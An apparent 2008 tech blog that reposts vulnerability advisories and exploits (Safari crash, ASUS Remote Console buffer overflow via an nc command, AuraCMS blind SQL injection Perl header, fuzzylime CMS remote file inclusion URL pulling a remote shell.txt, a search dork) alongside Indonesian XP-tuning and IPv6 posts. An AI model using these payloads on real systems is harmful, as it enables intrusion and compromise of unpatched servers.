Software And Internet Blog





March 24, 2008

Safari 3.1 for windows download bug

Filed under: Software Review

This is another flaw I found in the Safari browser for Windows, the fault lies when trying to download a file with a very long name that causes the program is broken and pull the following exception.

Access violation when reading[11b5c539]

If the file is filled with more letters to cause an exception but when he writes, in the proof of concept only leave the reading as geocities leaves no upload a file with a long name but if you assemble your own server and create a zip archive with nothing inside and the name of the letter “A” until there is no more space in the name provokes the following exception.

Acess violation when writing to [9c236d62]

Below left the proof of concept? greetings and continue well !!!!!!!

POC

http://es.geocities.com/jplopezy/pruebasafari2.html

Juan Pablo Lopez Yacubian

fuzzertina.blogspot.com

source : securityfocus.com

Bug - Buffer-overflow in ASUS Remote Console 2.0.0.24

Filed under: System Security

Luigi Auriemma

Application: ASUS Remote Console
http://www.asus.com/999/html/share/9/icon/9/index.htm#asmb3
Versions: <= 2.0.0.24
Platforms: Windows
Bug: buffer overflow
Exploitation: remote
Date: 21 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi (at) autistici (dot) org [email concealed]
web: aluigi.org

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From the manual:
“The ASUS Remote Console (ARC) is an efficient and flexible application
that allows monitoring and control of the remote host.”

The main component of this service is a telnet server listening on port
623 which is called DpcProxy and provides an IPMI interface.

======
2) Bug
======

The DPC Proxy is affected by a buffer-overflow vulnerability located in
the function which gets the data received from the client, stores them
in a stack buffer of about 1024 bytes and checks the presence of an end
of line delimiter (carriage return).

===========
3) The Code
===========

http://aluigi.org/poc/asuxdpc.txt

nc SERVER 623 -v -v -w 2 < asuxdpc.txt

======
4) Fix
======

No fix


Luigi Auriemma
http://aluigi.org

March 15, 2008

5 Langkah Mempercepat Kinerja Windows XP

Filed under: Internet Technology

Sebenernya banyak cara mempercepat akses Windows Xp, tapi yang paling dominan dan hasilnya langsung terlihat ya langkah-langkah seperti ini…mau tau??

Langkah Pertama :

* Masuk ke Regedit, caranya Start, Run, ketik Regedit
* Find key ” MenuShowDelay”, defaultnya 400, ganti jadi 0
* ganti nilai key ” HungAppTimeout ” jadi 10
* ganti nilai key ” WaitToKillAppTimeout ” jadi 10
* Setelah semuanya diganti, tekan F3 untuk mencari key yang sama, dan ganti seperti nilai di atas

Langkah Kedua :

* Start, Run, ketik Services.msc
* matikan services yang dianggap tidak diperlukan, ini juga dapat mempengaruhi kinerja sistem
* misal service Automatic Updates, stop services, dan pada pilihan startup type pilih disabled atau manual. Jadi automatic update ga akan di load saat proses startup.
* Stop services yang anda anggap tidak diperlukan. Setelah di stop, jangan lupa untuk rubah startup type nya menjadi manual atau disabled
(more…)

Sekilas Tentang IP V6

Filed under: Internet Technology

Ini adalah artikel yang saya sadur dari blog scratchz

alesan saya menyadur karena saya pikir artikel ini sangat bermanfaat karena dalam waktu dekat IPv6 bakal menggantikan IPv4….

saya ucapkan terimakasih kepada scratchz atas artikel yang telah di buat

IPv6 kependekan dari Internet Protocol Version 6 (versi 6, mengacu pada nomor versi yang diberikan) juga terkadang disebut Next Generation Internet Protocol (IPng) yang merupakan protokol internet baru yang dikembangkan dengan panjang alamat 128 bit. IPv6 muncul untuk mengatasi perkembangan terknologi informasi di masa mendatang. Pengembangan ini didasari kecenderungan penggunaan teknologi informasi khususnya internet (IP) yang meluas, dimana aplikasinya bukan hanya komputer saja, melainkan hampir seluruh perangkat elektronik yang membentuk suatu jaringan global.

Alamat IP adalah sederetan bilangan biner sepanjang 32 bit (IPv4), yang dipakai untuk mengidentifikasikan node/host/terminal pada jaringan. Seluruh node/host yang terhubung ke internet, dibedakan berdasarkan pada alamat IP dimana alamat IP haruslah unix atau berbeda satu sama lain. Pada awalnya alamat address dengan 32 bit ini dianggap mencukupi untuk dibagikan kepada host. Tetapi dengan perkembangan teknologi internet yang luar biasa, muncul kekhawatiran pada suatu saat nanti alamat IP akan habis akibat permintaan yang besar. Jumlah ruang alamat IPv4 (panjang alamat 32 bit) yang tersedia berkisar 232 atau sekitar 4,3 x 109. Sedangkan jumlah ruang alamat IPv6 (panjang alamat 128 bit) berkisar 2128 atau sekitar 3,4 x 1038. Dengan demikian, kapasitas alokasi alamat pada IPv6 jauh lebih besar dibandingkan alamat IPv4.

Perubahan yang mendasar pada IPv6 adalah perluasan ruang alamat, penyederhanaan header pada paket, plug&play serta fungsi securiti. Masing-masing perbaikan itu dimaksudkan agar dapat merespon pertumbuhan internet, meningkatkan reliability dan kemudahan pemakaian.

Alamat IPv6 terbagi atas 3 jenis, yang dimaksudkan sebagai pengenal pada 1 atau lebih interface, yaitu :

* Unicast Address yaitu alamat yang bersifat global.
* Multicast Address yaitu alamat pengidentifikasi untuk sekumpulan interface (umumnya milik node yang berbeda). Paket alamat yang dikirim ke alamat ini adalah paket yang dikirimkan ke semua interface yang diidentifikasi oleh alamat tersebut.
* Anycast Address yaitu alamat pengidentifikasi untuk sekumpulan interface (umumnya milik node yang berbeda). Paket alamat yang dikirim ke alamat ini adalah paket yang dikirimkan ke salah satu dari sekumpulan interface yang diidentifikasi oleh alamat tersebut.
(more…)

Bug - ASG-Sentry <= 7.0.0 Multiple Remote Vulnerabilities

Filed under: System Security

###########################################################

Luigi Auriemma

Application: ASG-Sentry
http://www.asg-sentry.com
Versions: < = 7.0.0
Platforms: Windows and Unix
Bugs: A] arbitrary files deleting
B] heap-overflow in FxAgent
C] termination of FxIAList
D] buffer-overflow in FxIAList
Exploitation: remote
Date: 10 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

#########################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

########################################################
===============
1) Introduction
===============

>From vendor’s website:
“The ASG-Sentry family of products is a suite of tools strategically
engineered to control, monitor, manage, and enhance your network.
Sentry’s tools provide you with full visibility to your network from
any Web browser. Sentry also allows you to fully instrument your
company’s applications, CPUs, disk space, memory, files, Windows and
UNIX platforms, and more.”
(more…)

Bug - AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit

Filed under: System Security

#!/usr/bin/perl -w
#
# Indonesian Newhack Security Advisory
# ————————————
# AuraCMS 2.x (online.php) - Remote Blind SQL Injection Exploit
# Waktu : Feb 15 2008 01:00PM
# Software : AuraCMS
# Versi : 2.0
# 2.1
# 2.2.1
# Vendor : http://www.auracms.org/
#
# ————————————
# Audit Oleh : NTOS-Team
# Lokasi : Indonesia | http://newhack.org
# Penjelasan :
#
# Kutu pada berkas “online.php”
# —//—
# 05. $uipanda=getenv(”HTTP_X_FORWARDED_FOR”); // < - Injeksi!
# 06. $uproxyserver=getenv("HTTP_VIA");
# 07. $uipproxy=getenv("REMOTE_ADDR");
# 08. $uhost=gethostbyaddr($uipproxy);
# 09. $utime=time();
# 10. $now=$utime-600; // (in seconds)
# --//--
# 12. @mysql_query("delete from useronline where timevisit<$now");
# 13. $uexists=@mysql_num_rows(@mysql_query("select id from useronline where ipproxy='$uipproxy'"));
# 14. if ($uexists>0){
# 15. @mysql_query(”update useronline set timevisit=’$utime’ where ipproxy=’$uipproxy’”);
# 16. } else {
# 17. @mysql_query(”insert into useronline (ipproxy,host,ipanda,proxyserver,timevisit) values(’$uipproxy’,'$uhost’,'$uipanda’,'$uproxyserver’,'$utime’)”); // < - Injeksi!
# 18. }
# ---//---
# Injeksi dilakukan melalui manipulasi header X-Forwarded-For yang ditumpangi perintah SQL
# referensi mengenai injeksi SQL "INSERT" -> http://www.milw0rm.com/papers/149
#
# => Perhatian!
# “Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari”
# Segela penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami
#
# =>Newhack Technology, OpenSource & Security
# ~ NTOS-Team->[fl3xu5,opt1lc] ~
use IO::Socket;
use strict;
(more…)

Bug - fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability

Filed under: System Security

.—————————————————————————–.
| vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability |
| download: http://cms.fuzzylime.co.uk/ |
| dork: “powered by fuzzylime” |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: cOndemned, str0ke, wacky |
‘—————————————————————————–’

# code:

/code/display.php:

1 2 $s = $_GET[s];
3 $p = $_GET[p];
4 $s = str_replace(”../”, “”, $s);
5 $p = str_replace(”../”, “”, $p);
6 if(empty($s)) $s = “front”;
7 if(empty($p)) $p = “index”;
8 $curs = $s;
9 $curp = $p;
10
11 include “code/settings.inc.php”;
12 include “${admindir}/languages/english.inc.php”;

line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D :D

# exploit:

http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]








Get free blog up and running in minutes with Blogsome
Theme designed by B A Khan